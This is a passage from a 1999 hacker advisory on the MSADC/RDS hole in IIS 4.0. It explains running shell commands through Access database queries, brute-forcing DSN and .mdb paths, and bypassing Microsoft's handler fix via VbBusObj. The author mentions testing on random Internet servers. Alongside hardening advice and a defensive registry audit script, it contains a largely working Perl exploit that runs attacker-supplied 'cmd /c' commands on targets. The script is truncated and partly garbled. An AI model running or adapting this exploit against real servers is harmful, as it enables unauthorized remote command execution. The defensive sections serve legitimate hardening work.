...didn't work. Damn. The problem was that it was passing the CREATE_DB parameter during the SQLDriverConnect() phase, and that just isn't going to cut it. We need to issue a SQLConfigDataSource() call (I think that was it...my mind is a mush of ODBC/SQL/RDS/ADO/OLEDB/FMP API right now) to get CREATE_DB to do its thing, and RDSServer.DataFactory.Query just wasn't going to give us love. So, after struggling with other nuances and ideas, I concluded that I couldn't make a DSN, or a .mdb from scratch using Access SQL via RDSServer.DataFactory without connecting to a database/.mdb beforehand. (**NOTE: if you know how this can be done, EMAIL ME! I WILL TRADE YOU 0DAY! :) rfp@wiretrip.net )

Well damn, so we need a database to make this work. Any ol' database will do (hell, even the WINS or DHCP .mdb should work >:). But unfortunately, none come by default on a standard NT install. Bummer. But wait....all is not lost.... It seems when you do a 'typical' or better install with Option Pack 4, a particular .mdb is installed...namely btcustmr.mdb, which is installed to %systemroot%\help\iis\htm\tutorial\. Microsoft saves the day!
They're just so damn efficient at helping us hack their own product... To get IIS 4.0 you practically need to install Option Pack 4, which will also then install MDAC 1.5--this is good. Let's just hope they didn't pick the 'minimal' install...

The last catch is that we need to figure out what %systemroot% is. On the majority of systems it will probably be c:\winnt, d:\winnt, e:\winnt, or f:\winnt (don't laugh, mine is f:). I guess some wacko might do \win, \windows, \nt, and if you upgraded it may be \winnt351 or \winnt35. Well, we can do a little 'brute force' on all those combinations until one works. Oh, and no, you can't do "dbq=%systemroot%\help\iis\htm\tutorial\btcustmr.mdb"...the SQL driver pukes.

So that's my guess! Mr. Gonzalez is using a connection string similar to

   "driver={Microsoft Access Driver (*.mdb)}; dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;"

with a query that contains one of the pipe-VBA-shell commands. Now, I think this technically meets all the known points of the exploit--the only fuzzy one is where Greg mentions "no need of an *active* database". Now, I may be reading into it, but btcustmr.mdb is hardly active. It's a totally unused .mdb sitting in a directory most people probably didn't know existed. Just to double check, I did a quick little test...and six of the ten servers I picked off the Internet were susceptible to this method. That's a tad better than Greg's 50%, but I had a small population sample, so I'll give him the benefit of the doubt.

Now, I obviously could be wrong. Maybe Greg found a way to create the .mdb, or some other way where he doesn't need to rely on the existence of btcustmr.mdb. I'm not claiming to be a SQL/database wiz--actually, I hate database applications. Period. They're gross. But I put up with it for the better good of the Internet. :) But yes, I could be wrong, and I'm willing to admit it. Let me also mention the contenders.
They were contenders, but definitely did not make the final round because, as much as they 'looked' and 'smelled' exploitable, I couldn't get them to crack:

1. Data Shape Provider. This already has hooks into the VBA interpreter (you can put VBA commands in the CALC() function--except it lacks shell()), and is a primary suspect in my eyes. The bonus is that you do *not* need any database files to use this. Well, barring the fact that I really don't know what I'm doing, I played around with it trying to feed some pipe-VBA-shells to it and whatnot, but couldn't get anything interesting to happen. Now, this is installed by default, has VBA hooks already, doesn't need a database, etc. I say this fits the description more than the btcustmr.mdb thing. And it's just all together 'cooler'.

2. Index Server Provider. Now, not all places use Index Server, so I highly doubted this was the route, but it is a contender. Again, you don't need a database file, so that's a bonus. I tried the usual pipe-VBA-shell commands, but no go either.

If I really had to choose, I'd say the exploit was in the Data Shape Provider (which Microsoft also warned of in the advisory). But since I couldn't get it to give me love, I went with btcustmr.mdb.

- 4 - Bonus Aspects of My Script

So, yes, I could be wrong. But I figure why not just feature-pack this script to *really* kick some ass? Well, so, I wasted a few brain cells (the things I do for you people...jeez) and thought of some good things to toss into the code. I figure hey, might as well make this a useful tool!

The first one is pretty obvious. There are many applications on the market that would be used on a server and that would make/require a DSN. For instance Cold Fusion creates a few DSNs, as does iHTML. Some of the sample apps that come with IIS create DSNs as well, and the MDAC makes a few too. All these potential DSNs. Remember, it only takes one DSN to work.
So if we wanted to, we could scan to see if any of a number of default DSNs exist, and if they do, use them. An extension of this would be user-created DSNs. Again, all we need is the DSN name, so we can scan for what are 'psychologically' common DSN names. For instance test, web, data, database, www, db, and sql are common DSN names. Basically, if you supply a dictionary file of DSN names you want to use, the script will sit there and brute force the DSN names, a la a remote password cracker. Of course, we'd need DSNs that use the Access driver. But what's nice is that if we connect to a valid DSN with an invalid SQL query, we'll get back the name of the driver in the error message. So it's a nice way to check.

Then we can also do an inverse type thing--instead of looking for common DSNs to connect to, we can look for common .mdbs to connect to. For instance MS Cert Server, DHCP, and WINS all use .mdbs, as do particular sample scripts, SDKs, etc. We can just try to connect to them directly. If we find one, rather than dealing with the table information within the .mdb, we can just CREATE TABLE on it first, and then use the table we just created. Very simple.

Another interesting feature is dumping the root scope paths from Index Server. Basically it's a query of "Select paths from scope()". This is useful because it can provide us with useful directory information...since one of the tricky problems is determining the location of html files and systemroot (although they're most likely guessable, that's not always the case). So I tossed this in for kicks, although it doesn't run 'inline' with the actual DSN/.mdb checks. You invoke this functionality separately.

The last extra functionality, but the easiest of them all, is to see if /scripts/tools/makedsn.exe exists on the webserver. If it does, we can make a DSN and define the .mdb file to use, and then use it right away. In my particular script I make a DSN named 'wicca'. (Greetings to Simple Nomad!
I wish you could have been around at DefCon. Next time.)

So, wow. Lots of ways to get a database connection. My RDS script tries them in the following order, continuing until successful:

- try raw driver connect to btcustmr.mdb
- try to create a DSN with /scripts/tools/makedsn.exe
- look for common DSNs
- look for common .mdbs
- try 'dictionary' attack on user DSNs

And separately you can query Index Server to get the paths information (Warning: this could be a lot of information! The script automatically sorts out common directories).

----- Campaign solicitation --------------------------------------------

XOR!! The unofficial AES candidate! There are many reasons why you should support XOR:

1. It's mad fast!
2. It can be implemented in very little code
3. It will run with decent performance even on the meekest of Casio watches
4. The ciphertext doesn't look like the plaintext--this is good.
5. Stream, block, chained, unchained, XOR does it all!
6. So many companies already use it as their encryption algo of choice!

So join the 'AES XOR y2k == 8w8' campaign today!

------------------------------------------------------------------------

One interesting feature that's almost necessary is a 'resume' mode. Imagine you just scanned a webserver, spending the last 5 minutes trying all the combinations of valid default .mdbs, valid DSNs, etc. Finally it cracks and you get one, and you run your command. Well, what if you want to run another command? Do you have to go through that rigmarole again? Well, not with my script. :) When you make a successful connection, it writes out a file called 'rds.save'. Then, you can just use the 'resume' switch (-R), with no other options. It will read in rds.save, and let you run a command against the successful connection again right away.

- 5 - More Bonus Features

Well, so far I haven't really provided anything really original. I'm all for originality. So I racked my brain.
I pored through all of Microsoft's ADO/OLEDB/RDS/ODBC documentation. I read their advisory. I disassembled billions of .dlls. And then inspiration struck.

You see, MDAC 1.5 installs *three* objects by default. RDSServer.DataFactory, which we've discussed before. AdvancedDataFactory, which is really an alias to RDSServer.DataFactory. But there's also one called VbBusObj.VbBusObjCls. This is really an example of a middle-tier business object of the possible three-tier RDS model. It implements four functions: Test, GetMachineName, ExecuteSQL, and GetRecordSet. Test does nothing for us. GetMachineName is fun just because it returns the machine's NetBIOS name, which is useful in many cases. So I tossed it in. You invoke it with the -N switch.

Now ExecuteSQL and GetRecordSet do basically the same thing: run a SQL query. The difference is ExecuteSQL just returns how many records we affected, while GetRecordSet returns the records as actual data. I chose to use GetRecordSet because it integrated better with the rest of the code, since its return was strikingly familiar to the output from the RDSServer.DataFactory control. This is not a big deal, other than a bandwidth issue, but we're not talking more than a few K of data here anyway.

I know you're probably thinking 'uh, so what. There's another way to do the same thing. I mean the GetMachineName thing is cool, but not all that special'. Well, no. You're wrong. And let me tell you why. Starting with MDAC 2.0 you can define custom handlers. Basically, rather than RDSServer.DataFactory going straight to the database driver, it takes a side trip through a handler.
This is the fix Microsoft mentioned in their security advisory at http://www.microsoft.com/security/bulletins/ms99-025.asp

They recommend you set the following registry entries:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo]
"handlerRequired"=dword:00000001
"DefaultHandler"="MSDFMAP.Handler"

which tells RDSServer.DataFactory that RDS *must* use a handler, and that the default handler is MSDFMAP.Handler. Then you can use msdfmap.ini to specify options for denying certain connections, etc. Microsoft even supplies HANDSAFE.EXE, which auto-extracts to a .reg file that sets the above registry keys, plus a list of safe handlers. So if you need RDS, the preferred upgrade route from MDAC 1.5 is to install the latest MDAC 2.x, and then run HANDSAFE.EXE to make sure to limit outside queries by using handlers, which are controlled.

Well, all this fun handler crud is implemented in RDSServer.DataFactory. So we're kinda screwed when we run RDSServer.DataFactory.Query (as we should be, as this is the fix). Well, guess what. VbBusObj.VbBusObjCls doesn't care about handlers. We just effectively bypassed the handler thing. Wait, let me spell it out for you:

THE MICROSOFT CUSTOM HANDLER FIX DOES NOT PREVENT THIS. WE CAN STILL RUN QUERIES. HANDSAFE.EXE/CUSTOM HANDLERS (THE RECOMMENDED MICROSOFT FIX) DO NOT PROTECT AGAINST THIS.

Wow. So we just use VbBusObj.VbBusObjCls instead of RDSServer.DataFactory. Simple enough. I think this is definitely a worthwhile feature. You can cause the script to use VbBusObj by specifying the -V option. But I will admit: VbBusObj.VbBusObjCls is not always installed. So this is not always the case. But it's a case, nonetheless.

NOTE: When using VbBusObj, I suggest you use -N *FIRST*. If you get a valid NetBIOS name back, VbBusObj exists. If you use -V without verifying VbBusObj exists, and in fact it doesn't exist, the script/connection will HANG! So just humor me and use -N first to see if -V is a valid option.
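The handler fix and the VbBusObj bypass come down to two registry locations: the HandlerInfo values above, and the ADCLaunch list under W3SVC\Parameters that names the objects msadcs.dll will instantiate (the key section 6 tells you to delete VbBusObj from). As an added example, not code from the advisory or from Microsoft, here is a Python audit of a regedit export (REGEDIT4 format) that checks both: is handlerRequired=1 with a DefaultHandler set, and is any handler-ignoring object still launchable? The export text is constructed; the RDSServer.DataFactory and AdvancedDataFactory ADCLaunch entries in the sample are assumed for illustration, only the VbBusObj entry and the two key paths come from the advisory.

```python
"""
Added example (not from the advisory or from Microsoft): audit a regedit
export for the MS99-025 HandlerInfo settings and for objects still
launchable through ADCLaunch, so the VbBusObj handler bypass can be
checked offline.  The export text produced by sample_export() is
constructed sample data, not a dump from a real host.
"""
import re

# key paths as given in the advisory
HANDLER_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DataFactory\HandlerInfo"
ADCLAUNCH_KEY = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
                 r"\W3SVC\Parameters\ADCLaunch")
# ProgIDs that run queries without consulting the handler (lower-cased)
BYPASS_OBJECTS = {"vbbusobj.vbbusobjcls"}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg_export(text):
    """Return {key_path_lower: {value_name_lower: value}} for a .reg export.
    Decodes "string" and dword: values; anything else is kept as raw text."""
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank or comment line
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1).lower()  # registry paths are case-insensitive
            keys.setdefault(current, {})
            continue
        m = _VAL_RE.match(line)
        if m and current is not None:
            name, val = m.group(1).lower(), m.group(2)
            if val.lower().startswith("dword:"):
                val = int(val[6:], 16)
            elif len(val) >= 2 and val[0] == val[-1] == '"':
                val = val[1:-1]
            keys[current][name] = val
    return keys


def launchable_objects(keys):
    """ProgIDs listed under ADCLaunch: what /msadc/msadcs.dll will instantiate."""
    prefix = ADCLAUNCH_KEY.lower() + "\\"
    return sorted(k[len(prefix):] for k in keys if k.startswith(prefix))


def audit_rds(text):
    """Return findings (strings). Empty list: handler is mandatory and no
    handler-bypassing object is launchable."""
    keys = parse_reg_export(text)
    findings = []
    hi = keys.get(HANDLER_KEY.lower())
    if hi is None:
        findings.append("HandlerInfo key absent: DataFactory queries go straight to the driver")
    else:
        if hi.get("handlerrequired") != 1:
            findings.append("handlerRequired is not 1: handler can be skipped")
        if not hi.get("defaulthandler"):
            findings.append("DefaultHandler not set")
    for obj in launchable_objects(keys):
        if obj in BYPASS_OBJECTS:
            findings.append(f"{obj} is launchable via ADCLaunch: bypasses the handler fix")
    return findings


def sample_export(objects, handler_fix):
    """Construct a REGEDIT4-style export (sample data) listing the given
    ADCLaunch ProgIDs, optionally with the HANDSAFE.EXE HandlerInfo values."""
    out = ["REGEDIT4", ""]
    if handler_fix:
        out += [f"[{HANDLER_KEY}]",
                '"handlerRequired"=dword:00000001',
                '"DefaultHandler"="MSDFMAP.Handler"', ""]
    for obj in objects:
        out += [f"[{ADCLAUNCH_KEY}\\{obj}]", ""]
    return "\n".join(out) + "\n"


# ADCLaunch contents assumed for a default MDAC 1.5 install (sample only)
DEFAULT_OBJECTS = ["RDSServer.DataFactory", "AdvancedDataFactory",
                   "VbBusObj.VbBusObjCls"]

if __name__ == "__main__":
    for label, objs, fix in (("stock", DEFAULT_OBJECTS, False),
                             ("handsafe only", DEFAULT_OBJECTS, True),
                             ("handsafe + VbBusObj key removed", DEFAULT_OBJECTS[:2], True)):
        print(label, "->", audit_rds(sample_export(objs, fix)) or ["ok"])
```

On a real box, feed it the output of 'regedit /e' for those two keys; the point of the second check is that HANDSAFE.EXE alone leaves the middle finding in place until the VbBusObj ADCLaunch key is gone.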
I could have automated it, but then again, why should I allow you to be lazy?

Now Microsoft does make some other mentions of just disabling RDS altogether. While this will work, unfortunately, RDS exists for a reason, and many people are using it legitimately. That means there are people who can't disable it because they use it. So what to do?

- 6 - How to Secure Your Server

Ok, I've talked so much on how to break this stuff. How about helping fix the matter? Well sure. Basically we have two situations: those who need RDS, and those who don't. I shall address both.

Those who need RDS:

I agree with Microsoft--custom handlers are the way to go. Unfortunately, there's that pesky VbBusObj to deal with. This is actually not that hard. You need to delete the VbBusObj references. Simply delete the following registry key:

   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
   W3SVC\Parameters\ADCLaunch\VbBusObj.VbBusObjCls
   (line broken for clarity)

ADCLaunch is the list of objects msadcs.dll is allowed to instantiate, so removing the key takes VbBusObj out of reach over HTTP even if the DLL stays registered. For peace of mind you can also delete vbbusobj.dll, which is installed at (pending root drives)

   c:\program files\common files\system\msadc\samples\selector\
   middle_tier\vbbusobj\vbbusobj.dll
   (again, line broken for clarity)

That should be it. Now, you'll need to read about custom handler creation, and cooperate with the DBAs at your location to come up with a suitable, yet secure handler definition.

Those who don't need RDS:

I would still upgrade your MDAC and run HANDSAFE.EXE just in case. But you can basically prevent people from using RDS remotely by removing the /msadc/ virtual root. You can do this in MMC or via the IIS Administration HTML interface.

For everybody:

While we're digging around IIS, let's do a little cleaning up, shall we? Let's start off with ODBC. Open up Control Panel, and go into ODBC. Look at the DSNs defined under User, System, and File. You should delete any DSNs you do not use, especially sample/default DSNs, such as 'pubs', 'advworks', 'adctest', etc.
You should fully research the need for any particular DSN you use. And personally, I would suggest when in doubt, record the configuration information and then remove it. Recording the information is important in case you have to put it back. Now, under ODBC Drivers, again, you should remove any drivers you do not use. Having 'SQL Server' means people could potentially proxy off your machine to another SQL server. The 'Microsoft Text Driver' should definitely be deleted. The more you delete, the safer you are.

Let's now pop over to IIS. Pull up MMC or the administrative web interface. Follow down the tree branches until you get to Default Web Site (or whatever your website might be). Examine which virtual directories you have mounted into your site. You should research the uses of these as well, deleting when in doubt (record the 'Properties' information first just in case). Virtual directories I suggest deleting (if you have them):

   IISSamples   These are the sample pages shipped with IIS--and contain a few bugs
   IISHelp      you can remove this. It's the HTML help reference.
   IISadmpwd    this is an IIS util for users to change their passwords via IIS. Unfortunately it contains a few bugs. I suggest you remove it.
   Msadc        mentioned above, remove if you don't need RDS

If you have Cold Fusion installed, you'll also have CFdocs. I suggest you remove it, as it contains a horde of exploitable sample scripts.

On to the last check, which is physical files. I'm going to assume the web directory is c:\inetpub. Adjust accordingly. I suggest checking the following:

-- c:\inetpub\scripts\tools
   This contains by default a few tools to make DSNs. I suggest you delete everything in this directory. Or, if you're worried about deleting it, then MOVE it out of the directory, and into one that's *NOT* available through your web server

-- c:\inetpub\scripts\samples
   Samples. Need I say more? Delete or move them.
   Contains scripts that are known to be exploitable (see my ODBC advisory)

-- c:\inetpub\scripts\iisadmin
   This is the IIS 3.0 administration interface. IIS 4.0 uses something different. Delete or move everything. Again, contains exploitable sample scripts.

-- c:\inetpub\iissamples\
   This contains the ExAir sample site, typically the SDK, and other fun goodies. But they're samples. Delete or move the whole directory. Contains exploitable sample scripts.

That should lock you down a lot more than the average IIS install. Unfortunately every location is different, so I can't guarantee you're secure now. But you're 'less unsecure'. :)

- 7 - Command Line Options

To run the program, just save this whole advisory to a file, such as msadc.pl. Then run "perl -x msadc.pl". Perl is smart and will figure out how to run the script at the end. No need to cut and paste. :)

Ok, the command switches are as follows:

-h   this is the host to scan. You MUST use either -h or -R.

-d   this is the delay between connections. Value is in number of seconds. I added this because hammering the RDS components caused the server to occasionally stop responding :) Defaults to 1. Use -d 0 to disable.

-V   Use VbBusObj instead of DataFactory to run the queries. NOTE: please read the -N information below for suggestions on checking if VbBusObj exists. VbBusObj does not give good error reporting; therefore it is quite possible to have false positives (and false negatives). Consider VbBusObj support 3 stages before beta. Don't say I didn't warn you.

-v   verbose. This will print the ODBC error information. Really only for troubleshooting purposes.

-e   external dictionary file to use on step 5--the 'DSN dictionary guess' stage. The file should just be plaintext, one DSN name per line, with all the DSN names you want to try. Quite honestly a normal dictionary file won't do you much good. You can probably do pretty damn well with a dozen or two good ones, like 'www', 'data', 'database', 'sql', etc.
-R   resume. You can still specify -v or -d with -R. This will cause the script to read in rds.save and execute the command on the last valid connection.

-N   Use VbBusObj to try to get the machine's NetBIOS name. It may return no name if VbBusObj is unavailable. I suggest you use -N to see if VbBusObj exists (a NetBIOS name will be returned if so) before you use -V.

-X   perform an Index Server table dump instead. None of the other switches really apply here, other than -v (although -d still works, there's no need to slow down one query). This dumps the root paths from Index Server, which can be rather lengthy. I suggest you pipe the output into a file. Also, if there is a lot of return information, this command may take a while to complete. Be patient. And I don't suggest you use this command more than once a minute...it caused my P200 w/ 128 RAM to stop answering requests, and in general borked inetinfo.exe. If you do decide to CONTROL-C in the middle of the data download, the script will save all received data into a file called 'raw.out', so you don't lose everything you've already received. NOTE: this is the raw data, which is in Unicode.

NOTE ON SUCCESS: The script reports 'Success!' when it has issued a valid SQL statement. 'Success!' does *NOT* mean that your command worked. If they have MDAC 2.1+, shell commands are worthless, so the script will report 'Success!' (it went through) but your command didn't run (MDAC 2.1 didn't interpret it). There's no return indication to know whether your command worked or not. As with the ODBC commands, you're flying blind.

- 8 - Random Q & A

- "This or that function of the script is broken"
-- Well, it wasn't broken when I used it, so you must have broken it. No, seriously. I've tested it on Linux, L0pht tested it on Solaris, and Vacuum tested it on NT (using Perl 5.005-03 for Windows). They worked for us. I've coded some various checks for errors, but nothing robust. But I know it worked for me.
:)

- "Why don't you code this in C?"
-- Because I've been programming C/C++ for 8 years. I'm tired of it. I've been coding perl for 3, so it's new and fresh, and I'm just now starting to do interesting stuff. Plus the code is portable this way. Come on, where else can you have a piece of code that does network/socket level stuff that runs on NT, Linux, and Solaris with no changes??!?

- "Are you going to port this to C?"
-- It wouldn't be that hard at all, but I wasn't planning on it. You have something against perl?

- "What's the F in Russell F. Prigogine stand for?"
-- Fabio. Fear the geese.

- "Why do you act like this is a joke?"
-- Because I don't get paid for doing this, I don't get donations, and I don't get any sexual gratification from this whatsoever. I do this because I *like* to, because it's *FUN*--so damn it, I'm having fun!

- "I don't get some of the jokes in the paper. Like what's FMP?"
-- If you have to ask, you wouldn't understand. This advisory is teeming with inside jokes. RFP, FMP.

- "Who picked your switches? v/V, R, X, N...d,v,h,e...they make no sense."
-- They do to me.

- "Where can I find the Internet's largest archive of hacked websites?"
-- Oh, wonderful that you should ask. www.attrition.org is just the place. Say 'hi' to Jericho for me when you get there.

- 9 - Signoff

Ok, I've been coding the script, reading MS database propaganda (did I mention yet I hate database stuff?), and writing this damn advisory for a collective 30 hours. About time I stop and never think about it again. :) So you have my best shot at the RDS exploit, even though I think there may be something pretty nifty hiding in the Data Shape Provider (or maybe Index Server). We'll just have to wait and see if/when Greg and Russ finally decide they can share their toys. Remember, I spent 2 days typing all this in an attempt to teach people something, rather than to just release the vanilla exploit.
So if you want to label me irresponsible, well, I suppose I could have been more so. Moreover, I support eEye in what they did 100%. Russ says "there are numerous unwritten rules when it comes to security disclosures". Rules? Unwritten? Well, maybe eEye was unaware of these rules, since they're not written down.

Future updates to this advisory and exploit code will be posted to www.technotronic.com/rfp/

Well, it's been fun. Until the next release (which may be sooner than you think ;)

- rain forest puppy / R. F. Prigogine -
- ADM / Wiretrip -
- rfp@wiretrip.net -

*** SPECIAL THANKS once again to Mudge and Weld from www.l0pht.com for helping me out on the preliminary assessment, and Mike Dinowitz from www.houseoffusion.com and Vacuum from www.technotronic.com for creative input.

Time is creation. The future is just not there.

Kitetoa, did you hack my ham sandwich!?!?

- 10 - The Code!!!!

Again, to run this, save this advisory to a file (for instance msadc.txt) and then run 'perl -x file' (ie perl -x msadc.txt).

#!perl
#
# MSADC/RDS 'usage' (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!

use Socket; use Getopt::Std;
getopts("e:vd:h:XRVN", \%args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";

if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h <host> { -d <delay> -X -v }
        -h <host>   = host you want to scan (ip or domain)
        -d <delay>  = delay between calls, default 1 second
        -X          = dump Index Server path table, if available
        -N          = query VbBusObj for NetBIOS name
        -V          = use VbBusObj instead of ActiveDataFactory
        -v          = verbose
        -e          = external dictionary file for step 5

   Or a -R will resume a command session

~; exit;}

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";

if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $ip.="."
if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}

if (!defined $args{R}){ $ret = &has_msadc; }

if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }
if (defined $args{N}) {&get_name; exit;}

print "Please type the NT commandline you want to run (cmd /c assumed):\n"
. "cmd /c ";
$in=<STDIN>; chomp $in;   # read the command from the terminal
$command="cmd /c " . $in ;

if (defined $args{R}) {&load; exit;}

print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;

print "\nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>\n" : print "<<failed>>\n";  # status words assumed; lost in this reprint

print "\nStep 3: Trying known DSNs...";
&known_dsn;

print "\nStep 4: Trying known .mdbs...";
&known_mdb;

if (defined $args{e}){
print "\nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { print "\nNo -e; Step 5 skipped.\n\n"; }

print "Sorry Charley...maybe next time?\n";
exit;

##############################################################################

sub sendraw {   # ripped and modded from whisker
 sleep($delay); # it's a DoS on the server! At least on mine...
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
  die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,80,$target)){
  select(S); $|=1;
  print $pstr; my @in=<S>;   # slurp the whole HTTP response
  select(STDOUT); close(S);
  return @in;
 } else { die("Can't connect...\n"); }}

##############################################################################

sub make_header { # make the HTTP request
 my ($which, $msadc); # yeah, this is WAY redundant.
# I'll fix it later
 if (defined $args{V}){ $msadc=<Datasource creation successful<\/H2>/;}} }
 return 0;}

##############################################################################

sub verify_exists {
 my ($page)=@_;
 my @results=sendraw("GET $page HTTP/1.0\n\n");
 return $results[0];}

##############################################################################

sub try_btcustmr {

 my @drives=("c","d","e","f");
 my @dirs=("winnt","winnt35","winnt351","win","windows");

 foreach $dir (@dirs) {
  print "$dir -> "; # fun status so you can see progress
  foreach $drive (@drives) {
   print "$drive: "; # ditto
   $reqlen=length( make_req(1,$drive,$dir) ) - 28;
   $reqlenlen=length( "$reqlen" );
   $clen= 206 + $reqlenlen + $reqlen;

   my @results=sendraw(make_header() . make_req(1,$drive,$dir));
   if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
   else { verbose(odbc_error(@results)); funky(@results);}}
  print "\n";}}

##############################################################################

sub odbc_error {
 my (@in)=@_; my $base;
 $base = content_start(@in);
 if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
  $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
  $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
  $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
  return $in[$base+4].$in[$base+5].$in[$base+6];}
 print "\nNON-STANDARD error. Please send this info to rfp\@wiretrip.net:\n";
 print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
 $in[$base+4] . $in[$base+5] .
 $in[$base+6];
 exit;}

##############################################################################

sub verbose {
 my ($in)=@_;
 return if !$verbose;
 print STDOUT "\n$in\n";}

##############################################################################

sub save {
 my ($p1, $p2, $p3, $p4)=@_;
 open(OUT, ">rds.save") || print "Problem saving parameters...\n";
 print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
 close OUT;}

##############################################################################

sub load {
 my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
 # rds.save is the file save() writes; the die text is assumed (lost in this reprint)
 open(IN,"<rds.save") || die("Couldn't open rds.save\n");
 @p=<IN>; close(IN);
 $ip="$p[0]"; $ip=~s/\n//g;
 $ip.="." if ($ip=~/[a-z]$/);
 $target= inet_aton($ip) || die("inet_aton problems");
 print "Resuming to $ip ...";
 $p[3]="$p[3]"; $p[3]=~s/\n//g;
 $p[4]="$p[4]"; $p[4]=~s/\n//g;
 if($p[1]==1) {
  $reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
  $reqlenlen=length( "$reqlen" );
  $clen= 206 + $reqlenlen + $reqlen;
  my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
  if (rdo_success(@results)){print "Success!\n";}
  else { print "failed\n"; verbose(odbc_error(@results));}}
 elsif ($p[1]==3){
  if(run_query("$p[3]")){ print "Success!\n";}
  else { print "failed\n"; }}
 elsif ($p[1]==4){
  if(run_query($drvst . "$p[3]")){ print "Success!\n"; }
  else { print "failed\n"; }}
 exit;}

##############################################################################

sub create_table {
 return 1 if (defined $args{V});
 my ($in)=@_;
 $reqlen=length( make_req(2,$in,"") ) - 28;
 $reqlenlen=length( "$reqlen" );
 $clen= 206 + $reqlenlen + $reqlen;
 my @results=sendraw(make_header() .
make_req(2,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 1 if $temp=~/Table 'AZZ' already exists/; return 0;} ############################################################################## sub known_dsn { # we want 'wicca' first, because if step 2 made the DSN, it's ready to go my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications", "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM", "banner", "banners", "ads", "ADCDemo", "ADCTest"); foreach $dSn (@dsns) { print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successful\n" if (!defined $args{V}); if(run_query("DSN=$dSn")){ print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; }}} print "\n";} ############################################################################## sub is_access { my ($in)=@_; return 1 if (defined $args{V}); $reqlen=length( make_req(5,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; $reqlen=length( make_req(3,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . 
make_req(3,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; # this is sparse, because I don't know of many my @sysmdbs=( "\\catroot\\icatalog.mdb", "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb", "\\system32\\certmdb.mdb", "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot% my @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", "\\cfusion\\cfapps\\security\\realm_.mdb", "\\cfusion\\cfapps\\security\\data\\realm.mdb", "\\cfusion\\database\\cfexamples.mdb", "\\cfusion\\database\\cfsnippets.mdb", "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb", "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb", "\\cfusion\\brighttiger\\database\\cleam.mdb", "\\cfusion\\database\\smpolicy.mdb", "\\cfusion\\database\cypress.mdb", "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb", "\\website\\cgi-win\\dbsample.mdb", "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ); #these are just \ foreach $drive (@drives) { foreach $dir (@dirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv . $drive . ":\\" . $dir . $mdb)){ print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n" if (!defined $args{V}); if(run_query($drv . $drive . ":\\" . $dir . $mdb)){ print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit; }}}}} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv . $drive . $dir . $mdb)){ print "\n" . $drive . $dir . $mdb . " successful\n" if (!defined {V}); if(run_query($drv . $drive . ":" . $dir . 
